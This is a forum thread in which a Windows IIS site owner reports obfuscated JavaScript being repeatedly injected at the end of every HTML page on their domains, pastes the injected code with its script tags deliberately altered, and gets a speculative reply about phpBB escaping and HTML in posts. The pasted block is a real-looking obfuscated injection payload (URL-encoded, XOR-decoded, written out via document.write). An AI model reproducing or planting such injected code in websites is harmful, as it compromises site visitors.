Hi,

Am new here. I am running a Windows IIs server and i have been getting some script code added to the end of each html page on all domains i am running. Most of the time the code is the same. I was running phpbb forums and suspect the virus came from there but not sure. I contacted the support forum for phpbb community and they said they would look into the security part of the code but never a response from them. So i deleted the databases for those forums and ftp'd the pages on all sites again only to find after a week all domains and pages are infected again. Below is the script code i am finding. I changed the script tag just in case <>

Any help would be appreciated.

Thanks,

Gibs

<!--[Q]--><*iadded this so it will not function>document.write(unescape("%3Cscript%3Eif%2 8rqX%21%3D1%29%7Bfunction%20Cv%28oh%29%7Breturn%20 oh%7Dtry%7Bfunction%20AGr%28vDJ%29%7Breturn%20pars eInt%28vDJ%29%7Dvar%20unW%3D%27ddvdrvd5vdUvdxvdsvd mvdfvd9vdFvdZvdzvdpvdLvdkvdMvdyvdjvdDvd7vd6vdXvdev dAvdlvdWvdOvdYvdqvd8vdovdCvdbvdVvdKvdJvdHvdNvdnvdI vdavdTvd4vdPvd3vdwvdSvdcvdBvdhvdGvdRvdivdgvrdvrrvr 5vrUvrxvrsvrmvrfvr9vrFvrZvrzvrpvrLvrkvrMvryvrjvrDv r7vr6vrXvrevrAvrlvrWvrOvrY%27%3Bvar%20LWg%3DCv%28% 27v%27%29%2CHGC%3DArray%28AGr%28%27166%27%29%2C248 16%5E24601%2CAGr%28%27249%27%29%2CAGr%28%27232%27% 29%2C21308%5E21455%2CAGr%28%27234%27%29%2C10549%5E 10715%2C31009%5E31109%2CAGr%28%27252%27%29%2CAGr%2 8%27239%27%29%2C14749%5E14697%2C11442%5E11335%2CAG r%28%27186%27%29%2C3434%5E3457%2CAGr%28%27217%27%2 9%2C16443%5E16521%2C23767%5E23611%2CAGr%28%27221%2 7%29%2CAGr%28%27237%27%29%2C11529%5E11711%2C10006% 5E10189%2C14861%5E15057%2CAGr%28%27227%27%29%2CAGr %28%27179%27%29%2C22400%5E22369%2C22926%5E22901%2C AGr%28%27226%27%29%2C32711%5E32517%2C17584%5E17431 %2C23452%5E23395%2C13217%5E13183%2CAGr%28%27195%27 %29%2C401%5E323%2C8398%5E8303%2CAGr%28%27180%27%29 %2CAGr%28%27206%27%29%2C666%5E621%2CAGr%28%27253%2 7%29%2C578%5E755%2CAGr%28%27162%27%29%2CAGr%28%271 72%27%29%2CAGr%28%27174%27%29%2CAGr%28%27170%27%29 %2CAGr%28%27254%27%29%2CAGr%28%27241%27%29%2C21071 %5E21239%2C30664%5E30495%2C12812%5E12997%2CAGr%28% 27231%27%29%2CAGr%28%27204%27%29%2C23703%5E23645%2 CAGr%28%27189%27%29%2C14142%5E14229%2C22788%5E2298 7%2CAGr%28%27242%27%29%2CAGr%28%27209%27%29%2C6377 %5E6175%2C29891%5E29719%2CAGr%28%27181%27%29%2CAGr %28%27213%27%29%2CAGr%28%27183%27%29%2C30233%5E303 93%2C19508%5E19599%2CAGr%28%27165%27%29%2C19883%5E 19803%2C7240%5E7305%2C30733%5E30921%2CAGr%28%27224 %27%29%2C7148%5E6991%2CAGr%28%27199%27%29%2CAGr%28 %27198%27%29%2C26386%5E26573%2CAGr%28%27248%27%29% 2C19315%5E19419%2CAGr%28%27216%27%29%2CAGr%28%2714 4%27%29%2CAGr%28%27208%27%29%2CAGr%28%27192%27%29% 2CAGr%28%27169%27%29%2C3532%5E3427%2CAGr%28%27173% 27%29%2CAGr%28%27176%27%29%29%3Bvar%20Zhz%2CbJt%3B var%20YuA%2CQXg%3D%27dddrd5dUdxdsdmdfd9dFdZd5dmdxd zdZdpdLdzdkdMdydjdDd7d6dXdedAdldpdydWdUdpdOd9dYdqd Zd8dDdpdodWdmd8dMdAd7dpdCdOdbdqdpdZd8dDdpdodWdmd8d MdAdVdpdCdOdbdKdrd8dmdJdxdHd8dMdOd9dYdKdNd8dmdJdxd Hd8dMdAdndIdadTd4d4d4d4d4dAdVdpdPdzd5dFdHd8dZdmdKd 5dzdzd3dxd8dpdqdpdydjdDdndwdqdwdnd8drd5dWdsd8dMd6d XdedAdndwdVd8dOdsdxdUd8drdqdwdndCdOdbdKdmdzdjdSdJd cdmdUdxdZdNdMdAdVdpdBdydWdUdpdhdGd9dqdRdrdid9dXdPd gdRdVdydWdUdprddUdmdqdRdidRd7dzrrdjdqdRdFdsdPdWdmd 8didKd5r5dWdrdrdxd5dmd8r5dKdzdUdNdRdVdydWdUdpdxdSr UdqdRrxrddmdHr5rxdRdVdxd9dMdPdzd5dFdHd8dZdmdKd5dzd zd3dxd8dKdxdZdPd8dOrsd9dMdhdGd9dndRdqdRdnrddUdmdAd pdqdqrmdidAdldydWdUdpdPr5rddqdPdzd5dFdHd8dZdmdKr5d zd5dWdmdxdzdZdKrddzdrdmdVdydWdUdpdsdzd6dqdpdRrddmd RdndRdmdsrfdRdndRrxrxdRdndMdpdPr5rddpr9dqdpdRdRrFd RdRrfdGdrrZdMdAdAdpdndpdPr5rddKdUd8dsr5dWd5d8dpdMr xrzrpdWrmrLd4rmrkdKrmrMrxd7dRdKdRdAdKdUd8dsr5dWd5d 8dpdMrxrydKdnrxd7dRdKdRdAdndRdKdRdndGdrrZdMdAdpdnd RdKdRdpdndpdzrrdjdndxdSrUdVdydWdUdpdbdorjdqdPdzd5d FdHd8dZdmdKd5dUd8dWdmd8rjr5d8dHd8dZdmdMdRdxd9dUdWd Hd8dRdAdVdbdorjdKdrd8dmd6dmdmdUdxrDdFdmd8dpdMdRdrd Ud5dRd7dpdsdzd6dAdVdbdorjdKrdd8dxdNrddmdqr7dVdbdor jdKdDdxdPdmrddqdTdVdbdorjdKd9dUdWdHd8r6dzdUdPd8dUd pdqdpd4dVdpdmdUdedldpdPdzd5dFdHd8dZdmdKrDdzdPdedKd Wdsdsd8dZdPdkrddxr5dPdpdMdpdbdorjdAdVdpdLdzdkdMdhd Gd9d7dprddUdmdpdAdVdBdpd5dWdmd5rddMd8dAdpdldPdzd5d FdHd8dZdmdKdDdUdxdmd8dpdMdRddrddmdHr5dfddrDdzdPded fddrxrDdzdPdedfddrxrddmdHr5dfdRdAdVdpdPdzd5dFdHd8d ZdmdKrDdzdPdedKdWdsdsd8dZdPdkrddxr5dPdpdMdpdbdorjd AdVdLdzdkdpdMdpdhdGd9d7rddUdmdAdpdVdBdpdBrXd9dFdZd 5dmdxdzdZdpdGdrrZdMdAdldpdydWdUdprdd8dbdqr7dTdVdyd WdUdpredJrAdqdwd4dir7rldTrWdarOdIrkd4dWrDd5dPd8d9d wd7dodYdzdqdwdwdVdpd9dzdUdMdOdYrddqd4dVdpdOdYrddpd ddprdd8dbdVdpdOdYrddndndAdpdodYdzdndqdpredJrAdKdrd FrDdrdmdUdMdSdWdmrddKd9r5dzdzdUdMdSdWdmrddKdUdWdZd PdzdHdMdArYredJrAdKr5d8dZdNdmrddAd7did7didAdVdpdUd 8dmdFdUdZdpdodYdzdVdpdBddrxdrd5dUdxdsdmdf%27%3Bvar %20tOA%3DString%28%29%3BunW%3DunW.split%28LWg%29%3 Bfor%20%28Zhz%3D0%3BZhz%3CQXg.length%3BZhz+%3D2%29 %7BYuA%3DQXg.substr%28Zhz%2C2%29%3Bfor%28bJt%3D0%3 BbJt%3CunW.length%3BbJt++%29%7Bif%28unW%5BbJt%5D%3 D%3DYuA%29break%3B%7DtOA+%3DString.fromCharCode%28 HGC%5BbJt%5D%5E154%29%3B%7Ddocument.write%28tOA%29 %3B%7Dcatch%28nPX%29%7B%7D%7Dvar%20rqX%3D1%3C/script%3E"))</i added this so it will not function><!--[/Q]-->

well i am not sure, but i can tell you that if you are getting a virus or whatever from this, i dont believe you posted the complete data, because either there is a major bug in PHPBB dealing with the page data being in the javascript (which shouldnt happen) or there is more too it.

It seems funny that there is <!--[Q]-->...<!--[/Q]--> which suggests either IE is executing &lt;!--[Q]--&gt;...&lt;--[/Q]--&gtl; or for some reason phpbb is not escaping it.

you are not allowing HTML code in your posts are you? because if you are that is probably your problem.